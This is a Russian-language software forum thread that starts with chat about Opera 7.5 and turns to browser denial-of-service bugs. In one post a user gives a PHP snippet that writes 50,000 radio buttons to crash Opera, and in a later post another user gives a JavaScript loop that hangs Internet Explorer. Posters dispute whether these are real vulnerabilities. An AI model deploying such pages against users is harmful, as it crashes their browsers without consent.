Главная Новые темы Список тем Задать вопрос Поиск  

Форум "Cофт"


Программное обеспечение, бесплатный софт, варез


 #0 ssk 28.04.04 15:49:20 - 12.07.06 12:27:31

Opera 7.5



кто-нибудь пробовал? Цитата

 #1 Deep © 28.04.04 16:26:28

еще нет...
но сейчас поставлю на закачку...  
 #2 Василий © 29.04.04 00:27:10

 Ни чо такая!
 #3 IronHawk © 11.07.06 18:18:11

Отказ в обслуживании в Opera
Opera 9, возможно более ранние версии.

Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании.

Уязвимость существует из-за ошибки при обработке большого количества radio-кнопок. Удаленный пользователь может с помощью специально сформированной Web страницы потребить большое количество системных ресурсов и вызвать отказ в обслуживании.
Пример:
<?phpfor ($i=0;$i<50000;$i++)
{
  echo '<input type="radio" name="vuln" value="">';
}
?>

 #4 VictorT © 11.07.06 18:51:42

> #3 IronHawk ©
Проверил, таки жрёт ресурсы. В 8-ке такой эффект не наблюдается. Кстати, лиса ведёт себя аналогично.
З.Ы. Правда уязвимостю называть язык не поворачивается.
 #5 ГНУМ © 11.07.06 19:23:27

> Opera 7.5
 кто-нибудь пробовал?  

Оперу не едят, а слушают, деревня
 #6 Лысый © 11.07.06 19:50:56

> #3 IronHawk © 11.07.06 20:18:11
Новая уязвимость во всех Windows
Пользователь может вызвать отказ в обслуживании.
Инструкция:
Пуск - Поиск - Файлы и папки
В строке поиска выбираем все диски и набираем *.exе
После кончания поиска нажимаем Ctrl+A и Enter

Как сказал ВикторТ - это не уязвимость. Уязвимость - это когда можно выполнить какой-то непредусмотренный код. А это так - лёгкий баг, после которого опера просто вылетает, ничего не делая с осью.
 #7 VictorT © 12.07.06 12:27:31

Вот ещё пример подобной "уязвимости". ИЕ умирает на пол часа. Другие броузеры отрабатывают за доли секунд.
   var cnt = 10000;
    var el = "";
    for (var i = 0; i < cnt; i++) {
        el += "<input type=\"text\" id=\"ser" + i + "\" name=\"serial[" + i + "]\"";
        el += "size=\"20\" maxlength=\"20\" ";
        if (i + 1 < cnt) {
            el += " onkeypress=\"return on_enter(" + (i+1) + ", event)\"";
        }
        if ((serial_value[i]) && (serial_value[i] != "") && (serial_value[i] != "undefined")) {
            el += " value=\"" + serial_value[i] + "\"";
        }
        el += " onblur=\"onblur_serial(" + i + ")\" /> ";
    }
    document.getElementById('serial').inner­HTML = el;




  • Написать ответ

    Имя: Регистрация HTML?
    smiles смайлики
    Потом перейти в:    
    паутина



      ©  webest.net, 2002-2007  

    top.mail.ru
    » Бесплатный счетчик посещений
    » Рейтинг сайтов